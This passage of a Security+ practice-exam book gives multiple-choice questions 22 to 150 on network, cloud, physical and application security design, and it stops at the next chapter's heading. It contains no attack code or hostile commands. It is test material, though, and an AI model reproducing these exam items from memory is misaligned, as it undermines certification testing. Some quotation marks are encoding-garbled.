2786D. Nonessential ports require more administrative effort to secure.
278722. Which type of firewall examines the content and context of each packet it encounters?
2788A. Packet filtering firewall
2789B. Stateful packet filtering firewall
2790C. Application layer firewall
2791D. Gateway firewall
279223. Which of the following would prevent a user from installing a program on a company-
2793owned mobile device?
2794A. Whitelisting
2795B. Blacklisting
2796C. ACL
2797D. HIDS
279824. You’re designing a new network infrastructure so that your company can allow unauthen-
2799ticated users connecting from the Internet to access certain areas. Your goal is to protect
2800the internal network while providing access to those areas. You decide to put the web
2801server on a separate subnet open to public contact. What is this subnet called?
2802A. Guest network
2803B. DMZ
2804C. Intranet
2805D. VLAN
280625. Upper management has decreed that a firewall must be put in place immediately, before
2807your site suffers an attack similar to one that struck a sister company. Responding to
2808this order, your boss instructs you to implement a packet filter by the end of the week. A
2809packet filter performs which function?
2810A. Prevents unauthorized packets from entering the network
2811B. Allows all packets to leave the network
2812C. Allows all packets to enter the network
2813D. Eliminates collisions in the network
281426. You’re outlining your plans for implementing a wireless network to upper management.
2815Which protocol was designed to provide security for a wireless network and is considered
2816equivalent to the security of a wired network?
2817A. WAP
2818B. WPA
2819C. WPA2
2820D. WEP
282127. An IV attack is usually associated with which of the following wireless protocols?
2822A. WEP
2823B. WAP
2824C. WPA
2825D. WPA2
2826
282728. Suzan is responsible for application development in her company. She wants to have all
2828web applications tested prior to being deployed live. She wants to use a test system that is
2829identical to the live server. What is this called?
2830A. Production server
2831B. Development server
2832C. Test server
2833D. Predeployment server
283429. John is responsible for security in his company. He is implementing a kernel integrity sub-
2835system for key servers. What is the primary benefit of this action?
2836A. To detect malware
2837B. To detect whether files have been altered
2838C. To detect rogue programs being installed
2839D. To detect changes to user accounts
284030. You are responsible for BIOS security in your company. Which of the following is the
2841most fundamental BIOS integrity technique?
2842A. Verifying the BIOS version
2843B. Using a TPM
2844C. Managing BIOS passwords
2845D. Backing up the BIOS
284631. You have been asked to implement security for SCADA systems in your company. Which
2847of the following standards will be most helpful to you?
2848A. NIST 800-82
2849B. PCI-DSS
2850C. NIST 800-30
2851D. ISO 27002
285232. Joanne works for a large insurance company. Some employees have wearable technology,
2853such as smart watches. What is the most significant security concern from such devices?
2854A. These devices can distract employees.
2855B. These devices can be used to carry data in and out of the company.
2856C. These devices may not have encrypted drives.
2857D. These devices may not have strong passwords.
285833. John is installing an HVAC system in his datacenter. What will this HVAC have the most
2859impact on?
2860A. Confidentiality
2861B. Availability
2862C. Fire suppression
2863D. Monitoring access to the datacenter
286434. Maria is a security engineer with a manufacturing company. During a recent investiga-
2865tion, she discovered that an engineer’s compromised workstation was being used to con-
2866nect to SCADA systems while the engineer was not logged in. The engineer is responsible
2867for administering the SCADA systems and cannot be blocked from connecting to them.
2868What should Maria do to mitigate this threat?
2869A. Install host-based antivirus software on the engineer’s system.
2870B. Implement account usage auditing on the SCADA system.
2871C. Implement an NIPS on the SCADA system.
2872D. Use FDE on the engineer’s system.
287335. Lucy works as a network administrator for a large company. She needs to administer sev-
2874eral servers. Her objective is to make it easy to administer and secure these servers, as well
2875as making the installation of new servers more streamlined. Which of the following best
2876addresses these issues?
2877A. Setting up a cluster
2878B. Virtualizing the servers
2879C. Putting the servers on a VLAN
2880D. Putting the servers on a separate subnet
288136. Gerard is responsible for secure communications with his company’s e-commerce server.
2882All communications with the server use TLS. What is the most secure option for Gerard
2883to store the private key on the e-commerce server?
2884A. HSM
2885B. FDE
2886C. SED
2887D. SDN
288837. You are the security officer for a large company. You have discovered malware on one of
2889the workstations. You are concerned that the malware might have multiple functions and
2890might have caused more security issues with the computer than you can currently detect.
2891What is the best way to test this malware?
2892A. Leave the malware on that workstation until it is tested.
2893B. Place the malware in a sandbox environment for testing.
2894C. It is not important to test it; just remove it from the machine.
2895D. Place the malware on a honeypot for testing.
289638. Web developers in your company currently have direct access to the production server and
2897can deploy code directly to it. This can lead to unsecure code, or simply code flaws being
2898deployed to the live system. What would be the best change you could make to mitigate
2899this risk?
2900A. Implement sandboxing.
2901B. Implement virtualized servers.
2902C. Implement a staging server.
2903D. Implement deployment policies.
290439. Denish is concerned about the security of embedded devices in his company. He is most
2905concerned about the operating system security for such devices. Which of the following
2906would be the best option for mitigating this threat?
2907A. RTOS
2908B. SCADA
2909C. FDE
2910D. TPM
291140. Which of the following 802.11 standards is supported in WPA2, but not in WEP or WPA?
2912A. 802.11a
2913B. 802.11b
2914C. 802.11i
2915D. 802.11n
291641. Teresa is responsible for WiFi security in her company. Which wireless security protocol
2917uses TKIP?
2918A. WPA
2919B. CCMP
2920C. WEP
2921D. WPA2
292242. Juan is responsible for wireless security in his company. He has decided to disable the SSID
2923broadcast on the single AP the company uses. What will the effect be on client machines?
2924A. They will no longer be able to use wireless networking.
2925B. They will no longer see the SSID as a preferred network when they are connected.
2926C. They will no longer see the SSID as an available network.
2927D. They will be required to make the SSID part of their HomeGroup.
292843. Which cloud service model provides the consumer with the infrastructure to create appli-
2929cations and host them?
2930A. SaaS
2931B. PaaS
2932C. IaaS
2933D. CaaS
293444. Which cloud service model gives the consumer the ability to use applications provided by
2935the cloud provider over the Internet?
2936A. SaaS
2937B. PaaS
2938C. IaaS
2939D. CaaS
294045. Which feature of cloud computing involves dynamically provisioning (or deprovisioning)
2941resources as needed?
2942A. Multitenancy
2943B. Elasticity
2944C. CMDB
2945D. Sandboxing
294646. Which type of hypervisor implementation is known as “bare metal�
2947A. Type I
2948B. Type II
2949C. Type III
2950D. Type IV
295147. Mohaned is a security analyst and has just removed malware from a virtual server. What
2952feature of virtualization would he use to return the virtual server to a last known good
2953state?
2954A. Sandboxing
2955B. Hypervisor
2956C. Snapshot
2957D. Elasticity
295848. Lisa is concerned about fault tolerance for her database server. She wants to ensure that if
2959any single drive fails, it can be recovered. What RAID level would support this goal while
2960using distributed parity bits?
2961A. RAID 0
2962B. RAID 1
2963C. RAID 3
2964D. RAID 5
296549. Jarod is concerned about EMI affecting a key escrow server. Which method would be
2966most effective in mitigating this risk?
2967A. VLAN
2968B. SDN
2969C. Trusted platform module
2970D. Faraday cage
297150. John is responsible for physical security at his company. He is particularly concerned
2972about an attacker driving a vehicle into the building. Which of the following would
2973provide the best protection against this threat?
2974A. A gate
2975B. Bollards
2976C. A security guard on duty
2977D. Security cameras
297851. Mark is responsible for cybersecurity at a small college. There are many computer labs
2979that are open for students to use. These labs are monitored only by a student worker, who
2980may or may not be very attentive. Mark is concerned about the theft of computers. Which
2981of the following would be the best way for him to mitigate this threat?
2982A. Cable locks
2983B. FDE on the lab computers
2984C. Strong passwords on the lab computers
2985D. Having a lab sign-in sheet
298652. Joanne is responsible for security at a power plant. The facility is very sensitive and secu-
2987rity is extremely important. She wants to incorporate two-factor authentication with
2988physical security. What would be the best way to accomplish this?
2989A. Smart cards
2990B. A mantrap with a smart card at one door and a pin keypad at the other door
2991C. A mantrap with video surveillance
2992D. A fence with a smart card gate access
299353. Which of the following terms refers to the process of establishing a standard for security?
2994A. Baselining
2995B. Security evaluation
2996C. Hardening
2997D. Normalization
299854. You are trying to increase security at your company. You’re currently creating an outline
2999of all the aspects of security that will need to be examined and acted on. Which of the fol-
3000lowing terms describes the process of improving security in a trusted OS?
3001A. FDE
3002B. Hardening
3003C. SED
3004D. Baselining
300555. Which level of RAID is a “stripe of mirrors�
3006A. RAID 1+0
3007B. RAID 6
3008C. RAID 0
3009D. RAID 1
301056. Isabella is responsible for database management and security. She is attempting to remove
3011redundancy in the database. What is this process called?
3012A. Integrity checking
3013B. Deprovisioning
3014C. Baselining
3015D. Normalization
301657. A list of applications approved for use on your network would be known as which of the
3017following?
3018A. Blacklist
3019B. Red list
3020C. Whitelist
3021D. Orange list
302258. Hans is a security administrator for a large company. Users on his network visit a wide
3023range of websites. He is concerned they might get malware from one of these many web-
3024sites. Which of the following would be his best approach to mitigate this threat?
3025A. Implement host-based antivirus.
3026B. Blacklist known infected sites.
3027C. Set browsers to allow only signed components.
3028D. Set browsers to block all active content (ActiveX, JavaScript, etc.).
302959. Elizabeth has implemented agile development for her company. What is the primary dif-
3030ference between agile development and the waterfall method?
3031A. Agile has fewer phases.
3032B. Waterfall has fewer phases.
3033C. Agile is more secure.
3034D. Agile repeats phases.
303560. John is using the waterfall method for application development. At which phase should he
3036implement security measures?
3037A. Requirements
3038B. Design
3039C. Implementation
3040D. All
304161. You are responsible for database security at your company. You are concerned that pro-
3042grammers might pass badly written SQL commands to the database, or that an attacker
3043might exploit badly written SQL in applications. What is the best way to mitigate this
3044threat?
3045A. Programmer training
3046B. Programming policies
3047C. Agile programming
3048D. Stored procedures
3049
305062. Mary is concerned about application security for her company’s application development.
3051Which of the following is the most important step for addressing application security?
3052A. Proper error handling
3053B. Regular data backups
3054C. Encrypted data transmission
3055D. Strong authentication
305663. Farès is responsible for managing the many virtual machines on his company’s networks.
3057Over the past two years, the company has increased the number of virtual machines sig-
3058nificantly. Farès is no longer able to effectively manage the large number of machines.
3059What is the term for this situation?
3060A. VM overload
3061B. VM sprawl
3062C. VM spread
3063D. VM zombies
306464. Mary is responsible for virtualization management in her company. She is concerned
3065about VM escape. Which of the following methods would be the most effective in mitigat-
3066ing this risk?
3067A. Only share resources between the VM and host if absolutely necessary.
3068B. Keep the VM patched.
3069C. Use a firewall on the VM.
3070D. Use host-based antimalware on the VM.
307165. You work at a large company. You are concerned about ensuring that all workstations
3072have a common configuration, no rogue software is installed, and all patches are kept up
3073to date. Which of the following would be the most effective for accomplishing this?
3074A. Use VDE.
3075B. Implement strong policies.
3076C. Use an image for all workstations.
3077D. Implement strong patch management.
307866. Juan is responsible for the physical security of the company server room. He has been
3079asked to recommend a type of fire suppression system for the server room. Which of the
3080following would be the best choice?
3081A. Wet pipe
3082B. Deluge
3083C. Pre-action
3084D. Halon
308567. You are responsible for server room security for your company. You are concerned about
3086physical theft of the computers. Which of the following would be best able to detect theft
3087or attempted theft?
3088A. Motion sensor–activated cameras
3089B. Smart card access to the server rooms
3090C. Strong deadbolt locks for the server rooms
3091D. Logging everyone who enters the server room
309268. Teresa has deployed session tokens on her network. These would be most effective against
3093which of the following attacks?
3094A. DDoS
3095B. Replay
3096C. SYN flood
3097D. Malware
309869. Hector is using infrared cameras to verify that servers in his datacenter are being properly
3099racked. Which of the following datacenter elements is he concerned about?
3100A. EMI blocking
3101B. Humidity control
3102C. Hot and cold aisles
3103D. HVAC
310470. Gerald is concerned about unauthorized people entering the company’s building. Which
3105of the following would be most effective in preventing this?
3106A. Alarm systems
3107B. Fencing
3108C. Cameras
3109D. Security guards
311071. Which of the following is the most important benefit from implementing SDN?
3111A. It will stop malware.
3112B. It provides scalability.
3113C. It will detect intrusions.
3114D. It will prevent session hijacking.
311572. Mark is an administrator for a health care company. He has to support an older, legacy
3116application. He is concerned that this legacy application might have vulnerabilities that
3117would affect the rest of the network. What is the most efficient way to mitigate this?
3118A. Use an application container.
3119B. Implement SDN.
3120C. Run the application on a separate VLAN.
3121D. Insist on an updated version of the application.
312273. Lars is auditing the physical security of a company. The company uses chain-link fences
3123on its perimeter. The fence is over pavement, not soft ground. How close to the ground
3124should the bottom of the fence be?
3125A. Touching the ground
3126B. Within 4 inches
3127C. There is no standard for this.
3128D. Within 2 inches
312974. Mia has to deploy and support a legacy application. The configuration for this application
3130and the OS it runs on are very specific and cannot be changed. What is the best approach
3131for her to deploy this?
3132A. Use an immutable server.
3133B. Use a VM.
3134C. Set permissions on the application so it cannot be changed.
3135D. Place the application on a separate VLAN.
313675. To mitigate the impact of a software vendor going out of business, a company that uses
3137vendor software should require which one of the following?
3138A. A detailed credit investigation prior to acquisition
3139B. A third-party source-code escrow
3140C. Substantial penalties for breach of contract
3141D. Standby contracts with other vendors
314276. Abigail is responsible for datacenters in a large, multinational company. She has to sup-
3143port multiple datacenters in diverse geographic regions. What would be the most effective
3144way for her to manage these centers consistently across the enterprise?
3145A. Hire datacenter managers for each center.
3146B. Implement enterprise-wide SDN.
3147C. Implement Infrastructure as Code (IaC).
3148D. Automate provisioning and deprovisioning.
314977. Olivia is responsible for web application security for her company’s e-commerce server.
3150She is particularly concerned about XSS and SQL injection. Which technique would be
3151most effective in mitigating these attacks?
3152A. Proper error handling
3153B. The use of stored procedures
3154C. Proper input validation
3155D. Code signing
315678. Sophia wants to test her company’s web application to see if it is handling input validation
3157and data validation properly. Which testing method would be most effective for this?
3158A. Static code analysis
3159B. Fuzzing
3160C. Baselining
3161D. Version control
316279. Omar is using the waterfall method for software development in his company. Which of
3163the following is the proper sequence for the waterfall method?
3164A. Requirements, design, implementation, testing, deployment, maintenance
3165B. Planning, designing, coding, testing, deployment
3166C. Requirements, planning, designing, coding, testing, deployment
3167D. Design, coding, testing, deployment, maintenance
316880. Lilly is responsible for security on web applications for her company. She is checking to
3169see that all applications have robust input validation. What is the best way to implement
3170validation?
3171A. Server-side validation
3172B. Client-side validation
3173C. Validate in transit
3174D. Client-side and server-side validation
317581. Edward is responsible for web application security at a large insurance company. One
3176of the applications that he is particularly concerned about is used by insurance adjusters
3177in the field. He wants to have strong authentication methods to mitigate misuse of the
3178application. What would be his best choice?
3179A. Authenticate the client with a digital certificate.
3180B. Implement a very strong password policy.
3181C. Secure application communication with TLS.
3182D. Implement a web application firewall (WAF).
318382. Sarah is the CIO for a small company. The company uses several custom applications
3184that have complicated interactions with the host operating system. She is concerned about
3185ensuring that systems on her network are all properly patched. What is the best approach
3186in her environment?
3187A. Implement automatic patching.
3188B. Implement a policy that has individual users patch their systems.
3189C. Delegate patch management to managers of departments so they can find the best
3190patch management for their departments.
3191D. Immediately deploy patches to a test environment, then as soon as testing is complete
3192have a staged rollout to the network.
319383. John is examining the logs for his company’s web applications. He discovers what he
3194believes is a breach. After further investigation, it appears as if the attacker executed code
3195from one of the libraries the application uses, code that is no longer even used by the
3196application. What best describes this attack?
3197A. Buffer overflow
3198B. Code reuse attack
3199C. DoS attack
3200D. Session hijacking
320184. Emiliano is a network administrator and is concerned about the security of peripheral
3202devices. Which of the following would be a basic step he could take to improve security
3203for those devices?
3204A. Implement FDE.
3205B. Turn off remote access (SSH, telnet, etc.) if not needed.
3206C. Utilize fuzzy testing for all peripherals.
3207D. Implement digital certificates for all peripherals.
320885. Ixxia is a software development team manager. She is concerned about memory leaks in
3209code. What type of testing is most likely to find memory leaks?
3210A. Fuzzing
3211B. Stress testing
3212C. Static code analysis
3213D. Normalization
321486. Victor is a network administrator for a medium-sized company. He wants to be able to
3215access servers remotely so that he can perform small administrative tasks from remote
3216locations. Which of the following would be the best protocol for him to use?
3217A. SSH
3218B. Telnet
3219C. RSH
3220D. SNMP
322187. Mark is responsible for a server that runs sensitive software for a major research facility.
3222He is very concerned that only authorized software execute on this server. He is also
3223concerned about malware masquerading as legitimate, authorized software. What
3224technique would best address this concern?
3225A. Secure boot
3226B. Software attestation
3227C. Sandboxing
3228D. TPM
322988. Hannah is a programmer with a large software company. She is interested in ensuring that
3230the module she just created will work well with a module created by another program.
3231What type of testing is this?
3232A. Unit testing
3233B. Regression testing
3234C. Stress testing
3235D. Integration testing
323689. Erik is responsible for the security of a SCADA system. Availability is a critical issue.
3237Which of the following is most important to implement?
3238A. SIEM
3239B. IPS
3240C. Automated patch control
3241D. Honeypot
324290. You are concerned about the security of new devices your company has implemented.
3243Some of these devices use SoC technology. What would be the best security measure you
3244could take for these?
3245A. Using a TPM
3246B. Ensuring each has its own cryptographic key
3247C. Using SED
3248D. Using BIOS protection
324991. Vincent works for a company that manufactures portable medical devices, such as insulin
3250pumps. He is concerned about ensuring these devices are secure. Which of the following is
3251the most important step for him to take?
3252A. Ensure all communications with the device are encrypted.
3253B. Ensure the devices have FDE.
3254C. Ensure the devices have individual antimalware.
3255D. Ensure the devices have been fuzz tested.
325692. Emile is concerned about securing the computer systems in vehicles. Which of the follow-
3257ing vehicle types has significant cybersecurity vulnerabilities?
3258A. UAV
3259B. Automobiles
3260C. Airplanes
3261D. All of the above
326293. Ariel is responsible for software development in her company. She is concerned that the
3263software development team integrate well with the network system. She wants to ensure
3264that software development processes are aligned with the security needs of the entire
3265network. Which of the following would be most important for her to implement?
3266A. Integration testing
3267B. Secure DevOps
3268C. Clear policies
3269D. Employee training
3270
327194. Greg is a programmer with a small company. He is responsible for the web application.
3272He has become aware that one of the modules his web application uses may have a secu-
3273rity flaw allowing an attacker to circumvent authentication. There is an update available
3274for this module that fixes the flaw. What is the best approach for him to take to mitigate
3275this threat?
3276A. Submit an RFC.
3277B. Immediately apply the update.
3278C. Place the update on a test server, then if it works apply it to the production server.
3279D. Document the issue.
328095. You are using a sophisticated system that models various attacks on your networks. You
3281intend for this system to help your team realize weak areas and improve response to
3282incidents. What is the most important step to take before relying on data from this system?
3283A. Get approval from a CAB.
3284B. Thoroughly review the systems documentation.
3285C. Verify the models being used.
3286D. Perform integration testing on the system.
328796. Your company has an accounting application that was developed in-house. It has been in
3288place for 36 months, and functioning very well, with very few issues. You have just made
3289a minor change to the tax calculation based on a change in tax law. What should be your
3290next step?
3291A. Deploy the change.
3292B. Get CAB approval for the change.
3293C. Perform stress testing.
3294D. Perform regression testing.
329597. Tom works as a software development manager for a large company. He is trying to
3296explain to management the difference between compiled code and runtime code. What is
3297the biggest advantage of compiled code?
3298A. Better performance
3299B. Platform independence
3300C. More secure
3301D. Faster development time
330298. Your company is interested in keeping data in the cloud. Management feels that public
3303clouds are not secure but is concerned about the cost of a private cloud. What is the
3304solution you would recommend?
3305A. Tell them there are no risks with public clouds.
3306B. Tell them they will have to find a way to budget for a private cloud.
3307C. Suggest that they consider a community cloud.
3308D. Recommend against a cloud solution at this time.
330999. Your development team primarily uses Windows, but they need to develop a specific solu-
3310tion that will run on Linux. What is the best solution to getting your programmers access
3311to Linux systems for development and testing?
3312A. Set their machines to dual-boot Windows and Linux.
3313B. PaaS
3314C. Set up a few Linux machines for them to work with as needed.
3315D. IaaS
3316100. Daniel works for a mid-sized financial institution. The company has recently moved some
3317of its data to a cloud solution. Daniel is concerned that the cloud provider may not sup-
3318port the same security policies as the company’s internal network. What is the best way to
3319mitigate this concern?
3320A. Implement a cloud access security broker.
3321B. Perform integration testing.
3322C. Establish cloud security policies.
3323D. Implement Security as a Service.
3324101. Hanz is responsible for the e-commerce servers at his company. He is concerned about
3325how they will respond to a DoS attack. Which software testing methodology would be
3326most helpful in determining this?
3327A. Regression testing
3328B. Stress testing
3329C. Integration testing
3330D. Fuzz testing
3331102. You are the CIO for a small company. The company wants to use cloud storage for some
3332of its data, but cost is a major concern. Which of the following cloud deployment models
3333would be best?
3334A. Community cloud
3335B. Private cloud
3336C. Public cloud
3337D. Hybrid cloud
3338103. Alisha is monitoring security for a mid-sized financial institution. Under her predecessor
3339there were multiple high-profile breaches. Management is very concerned about detecting
3340any security issues or breach of policy as soon as possible. Which of the following would
3341be the best solution for this?
3342A. Monthly audits
3343B. NIPS
3344C. NIDS
3345D. Continuous monitoring
3346
3347104. Helga works for a bank and is responsible for secure communications with the online
3348banking application. The application uses TLS to secure all customer communications.
3349She has noticed that since migrating to larger encryption keys, the server’s performance
3350has declined. What would be the best way to address this issue?
3351A. Implement a VPN concentrator.
3352B. Implement an SSL accelerator.
3353C. Return to smaller encryption keys.
3354D. Upgrade all servers.
3355105. What is the primary advantage of allowing only signed code to be installed on computers?
3356A. It guarantees that malware will not be installed.
3357B. It improves patch management.
3358C. It verifies who created the software.
3359D. It executes faster on computers with a TPM.
3360106. Which of the following is the best description for VM sprawl?
3361A. When VMs on your network outnumber physical machines
3362B. When there are more VMs than IT can effectively manage
3363C. When a VM on a computer begins to consume too many resources
3364D. When VMs are spread across a wide area network
3365107. Which of the following is the best description of a stored procedure?
3366A. Code that is in a DLL, rather than the executable
3367B. Server-side code that is called from a client
3368C. SQL statements compiled on the database server as a single procedure that can be
3369called
3370D. Procedures that are kept on a separate server from the calling application, such as in
3371middleware
3372108. Farès is responsible for security at his company. He has had bollards installed around the
3373front of the building. What is Farès trying to accomplish?
3374A. Gated access for people entering the building
3375B. Video monitoring around the building
3376C. Protecting against EMI
3377D. Preventing a vehicle from being driven into the building
3378109. Jane is concerned about servers in her datacenter. She is particularly worried about EMI.
3379What damage might EMI most likely cause to servers?
3380A. Damage to chips (CPU or RAM)
3381B. Temperature control issues
3382C. Malware infections
3383D. The staff could be locked out of the servers.
3384110. You are concerned about VM escape attacks. Which of the following would provide the
3385most protection against this?
3386A. Completely isolate the VM from the host.
3387B. Install a host-based antivirus on both the VM and the host.
3388C. Implement FDE on both the VM and the host.
3389D. Use a TPM on the host.
3390111. Teresa is the network administrator for a small company. The company is interested in a
3391robust and modern network defense strategy but lacks the staff to support it. What would
3392be the best solution for Teresa to use?
3393A. Implement SDN.
3394B. Use automated security.
3395C. Use Security as a Service.
3396D. Implement only as much security controls as they can support.
3397112. Dennis is trying to set up a system to analyze the integrity of applications on his network.
3398He wants to make sure that the applications have not been tampered with or Trojaned.
3399What would be most useful in accomplishing this goal?
3400A. Implement NIPS.
3401B. Use cryptographic hashes.
3402C. Sandbox the applications in question.
3403D. Implement NIDS.
3404113. George is a network administrator at a power plant. He notices that several turbines had
3405unusual ramp-ups in cycles last week. After investigating, he finds that an executable was
3406uploaded to the system control console and caused this. Which of the following would be
3407most effective in preventing this from affecting the SCADA system in the future?
3408A. Implement SDN.
3409B. Improve patch management.
3410C. Place the SCADA system on a separate VLAN.
3411D. Implement encrypted data transmissions.
3412114. Tom is responsible for VPN connections in his company. His company uses IPSec for
3413VPNs. What is the primary purpose of AH in IPSec?
3414A. Encrypt the entire packet.
3415B. Encrypt just the header.
3416C. Authenticate the entire packet.
3417D. Authenticate just the header.
3418115. Mia is a network administrator for a bank. She is responsible for secure communications
3419with her company’s customer website. Which of the following would be the best for her to
3420implement?
3421A. SSL
3422B. PPTP
3423C. IPSec
3424D. TLS
3425
3426116. Abigail is responsible for setting up an NIPS on her network. The NIPS is located in one
3427particular network segment. She is looking for a passive method to get a copy of all traf-
3428fic to the NIPS network segment so that it can analyze the traffic. Which of the following
3429would be her best choice?
3430A. Using a network tap
3431B. Using port mirroring
3432C. Setting the NIPS on a VLAN that is connected to all other segments
3433D. Setting up an NIPS on each segment
3434117. Janice is explaining how IPSec works to a new network administrator. She is trying to
3435explain the role of IKE. Which of the following most closely matches the role of IKE in
3436IPSec?
3437A. It encrypts the packet.
3438B. It establishes the SAs.
3439C. It authenticates the packet.
3440D. It establishes the tunnel.
3441118. Jeff is the security administrator for an e-commerce site. He is concerned about DoS
3442attacks. Which of the following would be the most effective in addressing this?
3443A. DDoS mitigator
3444B. WAF with SPI
3445C. NIPS
3446D. Increased available bandwidth
3447119. Doug is a network administrator for a small company. The company has recently imple-
3448mented an e-commerce server. This has placed a strain on network bandwidth. What
3449would be the most cost-effective means for him to address this issue?
3450A. Isolate the new server on a separate network segment.
3451B. Upgrade the network to CAT 7.
3452C. Move to fiber optic.
3453D. Implement aggregation switches.
3454120. Liam is responsible for monitoring security events in his company. He wants to see how
3455diverse events may connect. He is interested in identifying different indicators of compro-
3456mise that may point to the same breach. Which of the following would be most helpful for
3457him to implement?
3458A. NIDS
3459B. SIEM
3460C. Correlation engine
3461D. Aggregation switch
3462121. Emily manages the IDS/IPS for her network. She has an NIPS installed and properly
3463configured. It is not detecting obvious attacks on one specific network segment. She has
3464verified that the NIPS is properly configured and working properly. What would be the
3465most efficient way for her to address this?
3466A. Implement port mirroring for that segment.
3467B. Install an NIPS on that segment.
3468C. Upgrade to a more effective NIPS.
3469D. Isolate that segment on its own VLAN.
3470122. You have been instructed to find a VPN solution for your company. Your company uses
3471TACACS+ for remote access. Which of the following would be the best VPN solution for
3472your company?
3473A. PPTP
3474B. RADIUS
3475C. L2TP
3476D. CHAP
3477123. Jacob is the CIO for a mid-sized company. His company has very good security policies
3478and procedures. The company has outsourced its web application development to a well-
3479known web programming company. Which of the following should be the most important
3480security issue for Jacob to address?
3481A. The web application vendor’s hiring practices
3482B. The financial stability of the web application vendor
3483C. Security practices of the web application vendor
3484D. Having an escrow for the source code
3485124. Gerard is responsible for physical security at his company. He is considering using cam-
3486eras that would detect a burglar entering the building at night. Which of the following
3487would be most useful in accomplishing this goal?
3488A. Motion-sensing camera
3489B. Infrared-sensing camera
3490C. Sound-activated camera
3491D. HD camera
3492125. Tim is implementing a Faraday cage around his server room. What is the primary purpose
3493of a Faraday cage?
3494A. Regulate temperature
3495B. Regulate current
3496C. Block intrusions
3497D. Block EMI
3498126. You are working for a large company. You are trying to find a solution that will provide
3499controlled physical access to the building and record every employee who enters the
3500building. Which of the following would be the best for you to implement?
3501A. A security guard with a sign-in sheet
3502B. Smart card access
3503C. A camera by the entrance
3504D. A sign-in sheet by the front door
3505127. David is responsible for cryptographic keys in his company. What is the best way to
3506deauthorize a public key?
3507A. Send out a network alert.
3508B. Delete the digital certificate.
3509C. Publish that certificate in the CRL.
3510D. Notify the RA.
3511128. Thomas is trying to select the right fire extinguisher for his company’s server room.
3512Which of the following would be his best choice?
3513A. Type A
3514B. Type B
3515C. Type C
3516D. Type D
3517129. Carole is concerned about security for her server room. She wants the most secure lock
3518she can find for the server room door. Which of the following would be the best choice for
3519her?
3520A. Combination lock
3521B. Key-in-knob
3522C. Deadbolt
3523D. Padlock
3524130. What is the ideal humidity range for a server room?
3525A. 70% to 80%
3526B. 40% to 60%
3527C. Below 30%
3528D. Above 70%
3529131. Molly is implementing biometrics in her company. Which of the following should be her
3530biggest concern?
3531A. FAR
3532B. FRR
3533C. CER
3534D. EER
3535132. Daniel is responsible for physical security in his company. All external doors have
3536electronic smart card access. In an emergency such as a power failure, how should the
3537doors fail?
3538A. Fail secure
3539B. Fail closed
3540C. Fail open
3541D. Fail locked
3542133. Donald is responsible for networking for a defense contractor. He is concerned that
3543emanations from UTP cable could reveal classified information. Which of the following
3544would be his most effective way to address this?
3545A. Migrate to CAT 7 cable.
3546B. Implement protected cabling.
3547C. Place all cable in a Faraday cage.
3548D. Don’t send any classified information over the cable.
3549134. Fred is responsible for physical security in his company. He wants to find a good way
3550to protect the USB thumb drives that have BitLocker keys stored on them. Which of the
3551following would be the best solution for this situation?
3552A. Store the drives in a secure cabinet.
3553B. Encrypt the thumb drives.
3554C. Don’t store BitLocker keys on these drives.
3555D. Lock the thumb drives in desk drawers.
3556135. Juanita is responsible for servers in her company. She is looking for a fault-tolerant
3557solution that can handle two drives failing. Which of the following should she select?
3558A. RAID 1+0
3559B. RAID 3
3560C. RAID 5
3561D. RAID 6
3562136. You are a network administrator for a mid-sized company. You need all workstations to
3563have the same configuration. What would be the best way for you to accomplish this?
3564A. Push out a configuration file.
3565B. Implement a policy requiring all workstations to be configured the same way.
3566C. Ensure all computers have the same version of the operating system and the same
3567applications installed.
3568D. Use a master image that is properly configured and image all workstations from that.
3569
3570137. Mike is a network administrator for an e-commerce company. There have been several
3571updates to the operating system, the web server software, and the web application, all
3572within the last 24 hours. It appears that one of these updates has caused a significant
3573security problem. What would be the best approach for Mike to take to correct this
3574problem?
3575A. Remove the updates one at a time to see which corrects the problem.
3576B. Roll the server back to the last known good state.
3577C. Investigate and find out which update caused the problem, and remove only that
3578update.
3579D. Investigate and find out which update caused the problem, and find a patch for that
3580issue.
3581138. Which device would most likely process the following rules?
3582PERMIT IP ANY EQ 443
3583DENY IP ANY ANY
3584A. NIPS
3585B. HIPS
3586C. Content filter
3587D. Firewall
3588139. Ixxia is responsible for security at a mid-sized company. She wants to prevent users on her
3589network from visiting job-hunting sites while at work. Which of the following would be
3590the best device to accomplish this goal?
3591A. Proxy server
3592B. NAT
3593C. Firewall
3594D. NIPS
3595140. You are responsible for an e-commerce site. The site is hosted in a cluster. Which of the
3596following techniques would be best in assuring availability?
3597A. A VPN concentrator
3598B. Aggregate switching
3599C. An SSL accelerator
3600D. Load balancing
3601141. When you are concerned about application security, what is the most important issue in
3602memory management?
3603A. Never allocate a variable any larger than is needed.
3604B. Always check bounds on arrays.
3605C. Always declare a variable where you need it (i.e., at function or file level if possible).
3606D. Make sure you release any memory you allocate.
3607142. Darrel is looking for a cloud solution for his company. One of the requirements is that
3608the IT staff can make the transition with as little change to the existing infrastructure as
3609possible. Which of the following would be his best choice?
3610A. Off-premises cloud
3611B. On-premises cloud
3612C. Hybrid solution
3613D. Use only a community cloud
3614143. Ryan is concerned about the security of his company’s web application. Since the
3615application processes confidential data, he is most concerned about data exposure. Which
3616of the following would be the most important for him to implement?
3617A. WAF
3618B. TLS
3619C. NIPS
3620D. NIDS
3621144. Arjun has just taken over web application security for a small company. He notices that
3622some values are temporarily stored in hidden fields on one of the web pages. What is this
3623called and how would it be best characterized?
3624A. This is obfuscation, a weak security measure.
3625B. This is data hiding, a weak security measure.
3626C. This is obfuscation, a possible security flaw.
3627D. This is data hiding, a possible security flaw.
3628145. What is the primary reason a company would consider implementing Agile programming?
3629A. To speed up development time
3630B. To improve development documentation
3631C. To focus more on design
3632D. To focus more on testing
3633146. When you’re implementing security cameras in your company, which of the following is
3634the most important concern?
3635A. High-definition video
3636B. Large storage capacity
3637C. How large an area the camera can cover
3638D. Security of the camera and video storage
3639147. What is the primary security issue presented by monitors?
3640A. Unauthorized users may see confidential data.
3641B. Data can be detected from electromagnetic emanations.
3642C. Poor authentication
3643D. Screen burn
3644
3645148. Clark is responsible for mobile device security in his company. Which of the following is
3646the most important security measure for him to implement?
3647A. Encrypted drives
3648B. Patch management
3649C. Remote wiping
3650D. Geotagging
3651149. Which of the following security measures is most effective against phishing attacks?
3652A. User training
3653B. NIPS
3654C. Spam filters
3655D. Content filter
3656150. You are the CISO for a mid-sized health care company. Which of the following is the most
3657important for you to implement?
3658A. Industry best practices
3659B. Contractual requirements
3660C. Strong security policies
3661D. Regulatory requirements
3662
3663+++++
3664++++
3665
3666
36674
3668Identity and Access
3669Management
3670The CompTIA Security+ Exam
